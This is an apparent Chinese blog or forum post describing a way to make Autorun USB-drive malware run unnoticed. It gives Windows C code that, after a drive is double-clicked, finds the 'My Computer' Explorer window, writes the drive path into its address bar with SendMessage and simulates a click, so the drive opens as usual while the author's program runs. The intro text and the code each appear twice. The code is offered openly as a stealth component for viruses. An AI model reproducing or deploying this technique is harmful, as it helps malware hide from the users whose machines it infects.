发现了一种新的方法来运行Autorun病毒而不被用户发觉
很多中过Autorun病毒的用户一定会有这样的体验 双击盘符不能打开硬盘 或者弹出打开方式对话框 还有最近流行的一种方法就是双击盘符会新建一个explorer
这样的病毒很容易被用户发觉 其实还可以采用另外一种方法 就是通过sendmessage
下面我给出代码
就是当双击盘符的时候,运行我们的程序 那么我们的程序查找“我的电脑”这个窗口 然后向这个窗口发送通过GetCurrentDiretory得到的当前目录这个文本 然后模拟按键 这样就能使explorer转到盘符 通过这种方式 和正常的打开盘符基本上没有区别
很多中过Autorun病毒的用户一定会有这样的体验 双击盘符不能打开硬盘 或者弹出打开方式对话框 还有最近流行的一种方法就是双击盘符会新建一个explorer
这样的病毒很容易被用户发觉 其实还可以采用另外一种方法 就是通过sendmessage
下面我给出代码
#include
<
windows.h
>
#include < stdio.h >
#include < assert.h >
int WINAPI WinMain(
HINSTANCE hInstance, // handle to current instance
HINSTANCE hPrevInstance, // handle to previous instance
LPSTR lpCmdLine, // command line
int nCmdShow // show state
)
{
HWND hwnd;
hwnd=FindWindow("CabinetWClass","我的电脑");
/*if(NULL==hwnd)
{
MessageBox(NULL,"can't found the window","error",MB_OK);
}
else
{
MessageBox(NULL,"found the window","done",MB_OK);
}*/
HWND hwnd1,hwnd2,hwnd3,hwnd4,hwnd5,hwnd6;
hwnd1 = FindWindowEx(hwnd,0,"WorkerW",0);
assert(hwnd1!=NULL);
hwnd2 = FindWindowEx(hwnd1,0,"ReBarWindow32",0);
assert(hwnd2!=NULL);
hwnd3 = FindWindowEx(hwnd2,0,"ComboBoxEx32",0);
assert(hwnd3!=NULL);
hwnd6=FindWindowEx(hwnd3,0,"ToolbarWindow32",0);
assert(hwnd6!=NULL);
hwnd4 = FindWindowEx(hwnd3,0,"ComboBox",0);
assert(hwnd4!=NULL);
hwnd5 =FindWindowEx(hwnd4,0,"Edit",0);
/* if(NULL!=hwnd5)
{
MessageBox(NULL,"ok","done",MB_OK);
}
*/
char buffer[4];
GetCurrentDirectory(4,buffer);
SendMessage(hwnd5,WM_SETTEXT,0,(LONG)buffer);
SendMessage(hwnd6,WM_LBUTTONDOWN,0,0);
SendMessage(hwnd6,WM_LBUTTONUP,0,0);
return 0;
}
#include < stdio.h >
#include < assert.h >
int WINAPI WinMain(
HINSTANCE hInstance, // handle to current instance
HINSTANCE hPrevInstance, // handle to previous instance
LPSTR lpCmdLine, // command line
int nCmdShow // show state
)
{
HWND hwnd;
hwnd=FindWindow("CabinetWClass","我的电脑");
/*if(NULL==hwnd)
{
MessageBox(NULL,"can't found the window","error",MB_OK);
}
else
{
MessageBox(NULL,"found the window","done",MB_OK);
}*/
HWND hwnd1,hwnd2,hwnd3,hwnd4,hwnd5,hwnd6;
hwnd1 = FindWindowEx(hwnd,0,"WorkerW",0);
assert(hwnd1!=NULL);
hwnd2 = FindWindowEx(hwnd1,0,"ReBarWindow32",0);
assert(hwnd2!=NULL);
hwnd3 = FindWindowEx(hwnd2,0,"ComboBoxEx32",0);
assert(hwnd3!=NULL);
hwnd6=FindWindowEx(hwnd3,0,"ToolbarWindow32",0);
assert(hwnd6!=NULL);
hwnd4 = FindWindowEx(hwnd3,0,"ComboBox",0);
assert(hwnd4!=NULL);
hwnd5 =FindWindowEx(hwnd4,0,"Edit",0);
/* if(NULL!=hwnd5)
{
MessageBox(NULL,"ok","done",MB_OK);
}
*/
char buffer[4];
GetCurrentDirectory(4,buffer);
SendMessage(hwnd5,WM_SETTEXT,0,(LONG)buffer);
SendMessage(hwnd6,WM_LBUTTONDOWN,0,0);
SendMessage(hwnd6,WM_LBUTTONUP,0,0);
return 0;
}